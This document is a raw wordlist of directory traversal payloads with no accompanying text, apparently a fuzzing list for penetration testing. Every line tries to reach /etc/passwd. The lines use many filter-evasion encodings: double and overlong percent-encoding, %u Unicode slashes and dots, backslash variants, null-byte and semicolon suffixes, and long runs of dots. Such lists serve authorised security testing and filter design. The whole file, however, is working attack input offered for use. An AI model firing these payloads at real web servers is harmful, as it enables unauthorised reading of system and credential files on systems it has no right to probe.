..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd
%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65%%32%66/etc/passwd
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd
..%%35%63/etc/passwd
..%%35%63..%%35%63/etc/passwd
..%%35%63..%%35%63..%%35%63/etc/passwd
..%%35%63..%%35%63..%%35%63..%%35%63/etc/passwd
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63/etc/passwd
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63/etc/passwd
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63/etc/passwd
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63/etc/passwd
%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
%%32%65%%32%65%%35%63/etc/passwd
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd
..//etc/passwd%00index.html
../..//etc/passwd%00index.html
../../..//etc/passwd%00index.html
../../../..//etc/passwd%00index.html
../../../../..//etc/passwd%00index.html
../../../../../..//etc/passwd%00index.html
../../../../../../..//etc/passwd%00index.html
../../../../../../../..//etc/passwd%00index.html
..%2f/etc/passwd%00index.html
..%2f..%2f/etc/passwd%00index.html
..%2f..%2f..%2f/etc/passwd%00index.html
..%2f..%2f..%2f..%2f/etc/passwd%00index.html
..%2f..%2f..%2f..%2f..%2f/etc/passwd%00index.html
..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd%00index.html
..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd%00index.html
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd%00index.html
%2e%2e//etc/passwd%00index.html
%2e%2e/%2e%2e//etc/passwd%00index.html
%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html
%2e%2e%2f/etc/passwd%00index.html
%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html
..%252f/etc/passwd%00index.html
..%252f..%252f/etc/passwd%00index.html
..%252f..%252f..%252f/etc/passwd%00index.html
..%252f..%252f..%252f..%252f/etc/passwd%00index.html
..%252f..%252f..%252f..%252f..%252f/etc/passwd%00index.html
..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd%00index.html
..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd%00index.html
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd%00index.html
%252e%252e//etc/passwd%00index.html
%252e%252e/%252e%252e//etc/passwd%00index.html
%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html
%252e%252e%252f/etc/passwd%00index.html
%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html
..\/etc/passwd%00index.html
..\..\/etc/passwd%00index.html
..\..\..\/etc/passwd%00index.html
..\..\..\..\/etc/passwd%00index.html
..\..\..\..\..\/etc/passwd%00index.html
..\..\..\..\..\..\/etc/passwd%00index.html
..\..\..\..\..\..\..\/etc/passwd%00index.html
..\..\..\..\..\..\..\..\/etc/passwd%00index.html
..%5c/etc/passwd%00index.html
..%5c..%5c/etc/passwd%00index.html
..%5c..%5c..%5c/etc/passwd%00index.html
..%5c..%5c..%5c..%5c/etc/passwd%00index.html
..%5c..%5c..%5c..%5c..%5c/etc/passwd%00index.html
..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd%00index.html
..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd%00index.html
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd%00index.html
%2e%2e\/etc/passwd%00index.html
%2e%2e\%2e%2e\/etc/passwd%00index.html
%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html
%2e%2e%5c/etc/passwd%00index.html
%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html
..%255c/etc/passwd%00index.html
..%255c..%255c/etc/passwd%00index.html
..%255c..%255c..%255c/etc/passwd%00index.html
..%255c..%255c..%255c..%255c/etc/passwd%00index.html
..%255c..%255c..%255c..%255c..%255c/etc/passwd%00index.html
..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd%00index.html
..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd%00index.html
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd%00index.html
%252e%252e\/etc/passwd%00index.html
%252e%252e\%252e%252e\/etc/passwd%00index.html
%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html
%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html
%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html
..//etc/passwd;index.html
../..//etc/passwd;index.html
../../..//etc/passwd;index.html
../../../..//etc/passwd;index.html
../../../../..//etc/passwd;index.html
../../../../../..//etc/passwd;index.html
../../../../../../..//etc/passwd;index.html
../../../../../../../..//etc/passwd;index.html
..%2f/etc/passwd;index.html
..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html
%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html
%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html
..%252f/etc/passwd;index.html
..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html
%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html
%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html
..\/etc/passwd;index.html
..\..\/etc/passwd;index.html
..\..\..\/etc/passwd;index.html
..\..\..\..\/etc/passwd;index.html
..\..\..\..\..\/etc/passwd;index.html
..\..\..\..\..\..\/etc/passwd;index.html
..\..\..\..\..\..\..\/etc/passwd;index.html
..\..\..\..\..\..\..\..\/etc/passwd;index.html
..%5c/etc/passwd;index.html
..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html
%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html
%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
..%255c/etc/passwd;index.html
..%255c..%255c/etc/passwd;index.html
..%255c..%255c..%255c/etc/passwd;index.html
..%255c..%255c..%255c..%255c/etc/passwd;index.html
..%255c..%255c..%255c..%255c..%255c/etc/passwd;index.html
..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd;index.html
..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd;index.html
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd;index.html
%252e%252e\/etc/passwd;index.html
%252e%252e\%252e%252e\/etc/passwd;index.html
%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html
%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html
%252e%252e%255c/etc/passwd;index.html
%252e%252e%255c%252e%252e%255c/etc/passwd;index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html
\..//etc/passwd
\../\..//etc/passwd
\../\../\..//etc/passwd
\../\../\../\..//etc/passwd
\../\../\../\../\..//etc/passwd
\../\../\../\../\../\..//etc/passwd
\../\../\../\../\../\../\..//etc/passwd
\../\../\../\../\../\../\../\..//etc/passwd
/..\/etc/passwd
/..\/..\/etc/passwd
/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/..\/..\/etc/passwd
/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd
...//etc/passwd
.../...//etc/passwd
.../.../...//etc/passwd
.../.../.../...//etc/passwd
.../.../.../.../...//etc/passwd
.../.../.../.../.../...//etc/passwd
.../.../.../.../.../.../...//etc/passwd
.../.../.../.../.../.../.../...//etc/passwd
...\/etc/passwd
...\...\/etc/passwd
...\...\...\/etc/passwd
...\...\...\...\/etc/passwd
...\...\...\...\...\/etc/passwd
...\...\...\...\...\...\/etc/passwd
...\...\...\...\...\...\...\/etc/passwd
...\...\...\...\...\...\...\...\/etc/passwd
....//etc/passwd
..../....//etc/passwd
..../..../....//etc/passwd
..../..../..../....//etc/passwd
..../..../..../..../....//etc/passwd
..../..../..../..../..../....//etc/passwd
..../..../..../..../..../..../....//etc/passwd
..../..../..../..../..../..../..../....//etc/passwd
....\/etc/passwd
....\....\/etc/passwd
....\....\....\/etc/passwd
....\....\....\....\/etc/passwd
....\....\....\....\....\/etc/passwd
....\....\....\....\....\....\/etc/passwd
....\....\....\....\....\....\....\/etc/passwd
....\....\....\....\....\....\....\....\/etc/passwd
..........................................................................//etc/passwd
........................................................................../..//etc/passwd
........................................................................../../..//etc/passwd
........................................................................../../../..//etc/passwd
........................................................................../../../../..//etc/passwd
........................................................................../../../../../..//etc/passwd
........................................................................../../../../../../..//etc/passwd
........................................................................../../../../../../../..//etc/passwd
..........................................................................\/etc/passwd
..........................................................................\..\/etc/passwd
..........................................................................\..\..\/etc/passwd
..........................................................................\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\..\..\/etc/passwd
..........................................................................\..\..\..\..\..\..\..\/etc/passwd
..%u2215/etc/passwd
..%u2215..%u2215/etc/passwd
..%u2215..%u2215..%u2215/etc/passwd
..%u2215..%u2215..%u2215..%u2215/etc/passwd
..%u2215..%u2215..%u2215..%u2215..%u2215/etc/passwd
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215/etc/passwd
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215/etc/passwd
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215/etc/passwd
%uff0e%uff0e//etc/passwd
%uff0e%uff0e/%uff0e%uff0e//etc/passwd
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd
%uff0e%uff0e%u2215/etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd
..%u2216/etc/passwd
..%u2216..%u2216/etc/passwd
..%u2216..%u2216..%u2216/etc/passwd
..%u2216..%u2216..%u2216..%u2216/etc/passwd
..%u2216..%u2216..%u2216..%u2216..%u2216/etc/passwd
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216/etc/passwd
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216/etc/passwd
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216/etc/passwd
..%uEFC8/etc/passwd
..%uEFC8..%uEFC8/etc/passwd
..%uEFC8..%uEFC8..%uEFC8/etc/passwd
..%uEFC8..%uEFC8..%uEFC8..%uEFC8/etc/passwd
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8/etc/passwd
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8/etc/passwd
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8/etc/passwd
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8/etc/passwd
..%uF025/etc/passwd
..%uF025..%uF025/etc/passwd
..%uF025..%uF025..%uF025/etc/passwd
..%uF025..%uF025..%uF025..%uF025/etc/passwd
..%uF025..%uF025..%uF025..%uF025..%uF025/etc/passwd
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025/etc/passwd
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025/etc/passwd
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025/etc/passwd
%uff0e%uff0e\/etc/passwd
%uff0e%uff0e\%uff0e%uff0e\/etc/passwd
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd
%uff0e%uff0e%u2216/etc/passwd
